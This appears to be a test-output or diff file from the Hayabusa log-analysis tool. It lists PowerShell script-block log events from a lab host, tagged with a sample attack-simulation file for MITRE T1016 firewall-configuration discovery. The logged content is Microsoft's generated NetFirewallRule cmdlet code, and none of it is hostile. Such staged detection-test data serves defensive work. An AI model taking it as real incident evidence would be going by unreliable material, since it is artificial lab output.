= Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpType')) { [object]$__cmdletization_value = ${IcmpType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletizat,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ion_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdlet",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.676 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') 